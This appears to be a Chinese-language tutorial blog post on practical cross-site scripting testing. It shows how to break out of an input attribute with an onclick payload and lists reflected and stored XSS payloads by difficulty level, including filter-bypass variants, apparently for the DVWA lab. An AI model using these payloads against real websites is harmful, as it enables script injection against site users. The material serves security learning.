• XSS攻击(3), 实战XSS注入思路


    XSS注入, XSS实战思路

    一, 可以输入文本或直接在url后面提交参数.

    网页源码:

    <input name=keyword value="">
    
    • 1

    对于这种input标签, 首先可以考虑使用 onclick 等事件来执行js.
    先输入 <> , " , onclick() 等等提交, 查看页面源代码.
    如果输入的符号没有被转义或替换, 说明前面可以闭合, 进一步测试.

    1. 首先考虑用 onclick() 等事件来执行js.

    查看源码:

    <input name=keyword value="<>">
    
    • 1

    输入payload:

    " οnclick="alert(1)
    
    • 1

    查看源码:

    <input name=keyword value="" onclick="alert(1)">
    
    • 1

    这时前面的value被闭合, 后面多了一个事件, 单机文本框即可弹出.

    2. 事件不能用时, 考虑用 因为锚点后面的部分不会作为url提交请求, 但是可以在前端执行.
    • 1
    • 2
    • 3
    • 4
    2, 反射型
    (1) Low: <script>alert(1)</script>
    (2) Medium: name=<scr<script>ipt>alert(1)</script># 或
    (3) High: <img src=l onerror=alert(1)>
    
    • 1
    • 2
    • 3
    3, 存储型
    (1) Low: 留言内容:<script>alert(1)</script>
    (2) Medium: Burp修改: <sc<script>ript>alert(/xss/)</script>,不能直接在页面上处理
    (3) High: txtName参数: <img src=l onerror=alert(1)>
    
    • 1
    • 2
    • 3
  • 相关阅读:
    centos如何安装最新版nodejs
    MySQL数据库期末考试试题及参考答案(07)
    ARM服务器上部署zookeeper集群
    Docker Desktop 界面功能介绍,添加国内镜像源
    加载SSL证书
    C++入门教程(十一、宏)
    GaussDB技术解读系列:高级压缩之OLTP表压缩
    MongoDB单机集群方案及详解
    Blazor 发布WebAssembly使用Brotli 压缩提升初次加载速度
    K8S容器内安装cur/telnet命令(Alpine Linux离线环境安装curl/telnet或其他工具)
  • 原文地址:https://blog.csdn.net/bua200720411091/article/details/133928308